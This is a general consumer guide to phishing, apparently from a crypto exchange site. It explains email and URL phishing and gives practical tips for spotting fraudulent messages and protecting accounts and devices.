What is Phishing?
Phishing is a type of Internet fraud used for gaining access to confidential data – logins and passwords, credit card numbers, emails, etc. The main goal of phishers is to steal personal user data or install malware on a victim’s device.
Phishing is a common type of cyber attack that everyone should learn about in order to protect themselves against fraudulent activities.
There are 2 main types of phishing attacks:
- Email phishing – suspicious emails may contain fake requests for help, messages from “your bank” or another payment system, notifications about winning a lottery that you did not take part in, etc.
- URL phishing – addresses of real sites are replaced with phishing addresses. For example, domain names may be substituted (.org used instead of .com, .gov, etc.). Usually phishers try to make fake links look like real links of actual organizations. They may also change some letters in the name of the site, and rely on users making typos or mistakes in spelling of the original site name.
According to the 2019 Verizon Data Breach Investigations Report, nearly a third of all breaches in the past year involved phishing. For cyber-espionage attacks, that number jumps to 78%. The worst phishing news of 2019 is that perpetrators are getting much better at what they do thanks to well-produced off-the-shelf tools and templates.
In the past cybercriminals often used misspelled or spoofed domain names. Today attackers apply more sophisticated methods, so fake pages look very similar to the original ones.
An attacker could exploit vulnerabilities in scripts of a genuine site. This type of fraud (known as cross-site scripting) is the most dangerous one since the user logs in to the page of the official website. It is very difficult to detect such fraud without special skills.
How to recognize phishing?
Unfortunately, it’s not always easy, but there are some clues that can help you to recognize a phishing attack:
- You know the sender of the message, but this is the person you don’t stay in touch with. Even if you know the name of the sender, but it does not apply to your regular contacts, this should already be suspicious.
- Don’t rush, be careful with emails marked as urgent. Try to stay calm and rational when the text of the email is trying to create a threatening atmosphere of emergency. For example, the order to follow the link before your account is blocked sounds quite suspicious. Remember that responsible organizations never ask customers to transfer personal data over the Internet.
- Don’t trust links or attachments in unsolicited emails. Such attachments may contain malware, ransomware, or viruses. If there is a link in an email, hover over the URL first. Secure websites with a valid Secure Socket Layer (SSL) certificate begin with “https”. Eventually, all sites will be required to have a valid SSL.
- Request for personal information is often used by cybercriminals, but banks, financial institutions, and online services are trying to avoid this.
- Pay attention to the grammar and writing style of the letter. Usually official emails are checked properly and don’t contain any mistakes.
- Beware of emails that have an offer that looks too profitable to be true. It may inform you that you won the lottery, received an expensive prize, or some unique items.
- Use spam filters. Generally, the filters assess the origin of the message, the software used to send it, and the appearance of the message to determine if it’s spam. Occasionally, spam filters may even block emails from legitimate sources, so they aren’t always 100% accurate.
- If you suspect that the received email was sent by a scammer, enter the sender’s name or a part of the message in Google and you will see if any phishing attacks are associated with this message.
- Be careful with charity related to worldwide disasters. Scammers are often set up fraudulent charity organizations to benefit from those who want to help. Don’t give your credit card number if you are not 100% sure that everything is true.
- If you often use crypto exchanges (for example, SimpleSwap), we strongly recommend you add the original site to bookmarks in order to avoid the use of phishing copies.
How to avoid URL phishing:
- Always check the URL address if you aren’t sure about website reliability.
- It is also useful to examine the official social media sites of the organization before using its services. The original web address should be mentioned there.
- Do not use suspicious search results.
- Do not use risky plugins and browser extensions.
- Do not follow links from suspicious emails and messages.
- Do not use third-party, unofficial applications that may have been created by scammers.
How to protect your devices from phishing?
Phishing is dangerous and may occur on any device such as a desktop computer, laptop, tablet or smartphone. To reduce the chance of meeting phishing services, you can take the following actions:
- Check your accounts regularly. Even if you are sure that nobody is trying to steal your credentials, check your bank and other online accounts for suspicious activity.
- Protect your computer by using security software. The software should have automatic updates to prevent the newest phishing tricks.
- Protect your mobile phone by setting anti-virus and applying fingerprint security features.
- Set two-factor authentication for all important apps. This feature protects your data from being stolen.
- Always backup your data and make sure those backups aren’t connected to your home network.
The easiest way to stay safe is always to be careful and never share confidential information unless you are sure that you are using a reliable source.
We hope this article will help you to stay away from phishing resources. Share this information with your friends so that they are also protected from fraud.